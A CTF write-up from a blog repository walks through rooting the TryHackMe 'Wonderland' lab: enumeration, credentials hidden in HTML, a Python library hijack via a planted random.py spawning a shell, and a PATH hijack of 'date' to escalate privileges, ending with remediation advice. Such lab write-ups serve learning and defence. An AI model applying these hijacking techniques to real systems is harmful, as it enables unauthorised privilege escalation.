d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-wonderland-thm/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

186 lines
5.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
title: "Writeup - Wonderland (THM)"
date: 2022-05-20
slug: "writeup-wonderland-thm"
type: "writeup-ctf"
---
This is a writeup for the [Wonderland](https://tryhackme.com/room/wonderland) machine from the TryHackMe site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV -T4 -Pn 10.10.11.146
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 7.6p1)
- 80/tcp : HTTP web server
![](img/image-2.webp)
## Exploit
At first I start by scanning the pages of the site:
![](img/image-3.webp)
When I go to the `r` page, I see the following message:
![](img/image-4.webp)
So I do a recursive scan to see the complete tree:
```bash
ffuf -c -u http://10.10.188.230/FUZZ -w wordlist/common.txt -recursion -recursion-depth 6
```
I finally find the following page:
![](img/image-5.webp)
I look at the source code of the page and find a `p` tag with a style that does not display it. The content of this tag looks very much like credentials...
```html
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, youre sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: theyre both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
```
So I try to connect via SSH :
![](img/image-6.webp)
I now have a shell and can retrieve the first flag.
```bash
alice@wonderland:~$ cat /root/user.txt
thm{"Curiouser and curiouser!"}
```
## Privilege escalation
Looking at the contents of the `home` folder, I find several users:
```bash
alice@wonderland:/home$ ls
alice hatter rabbit tryhackme
```
I am now looking at my sudo permissions:
![](img/image-7.webp)
So I can run this python script with the `rabbit` user's permissions. So I look at the content of this script:
```bash
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
[...]
And that was scarcely odd, because
Theyd eaten every one."""
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)
```
I run it to make sure I've got it right.
![](img/image-8.webp)
So it's a script that allows to output 10 random sentences from the text included in the script. Interestingly, the script uses `random`. So I create a `random.py` file in the same folder in which I insert a reverse shell. When the script is executed, it should use our file! So I create this new file with the following content :
```bash
import pty
pty.spawn("/bin/bash")
```
I now run the script with the following command:
![](img/image-9.webp)
In the folder of this new user, we find the file `teaParty`. Using the `strings` command, I can find the following readable text:
```bash
[...]
Welcome to the tea party!
The Mad Hatter will be here soon./bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for him
[...]
```
The program uses the `date` command, but interestingly, the program doesn't use an absolute path. So I'll be able to create a script with the same name, and then add the folder that contains this new script to the `$PATH` variable.
I start by creating the script with the following content:
```bash
#!/bin/bash
/bin/bash
```
Then I add the execution permissions and I add my personal folder at the beginning of the `PATH` variable.
```bash
chmod +x date
export PATH=/home/rabbit:$PATH
```
I can now run the program :
![](img/image-10.webp)
In the personal folder of this new user I find the following file:
```bash
hatter@wonderland:/home/hatter$ ls
password.txt
hatter@wonderland:/home/hatter$ cat password.txt
WhyIsARavenLikeAWritingDesk?
```
So I try to connect via SSH with this password:
![](img/image-11.webp)
After some research to do a privilege elevation I find nothing. So I try to run linpeas.sh. By analyzing the output of the command I find the following lines:
![](img/image-12.webp)
By going on the [GTFObins de Perl](https://gtfobins.github.io/gtfobins/perl/#capabilities) I find a way to make a privilege elevation.
Using the following command, I get a root shell and I can get the last flag.
![](img/image-13.webp)
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Do not leave passwords in HTML code
- Use absolute paths in programs
- Do not leave clear passwords in files
- Modify Perl permissions to avoid elevation of privilege.
Reference in New Issue View Git Blame Copy Permalink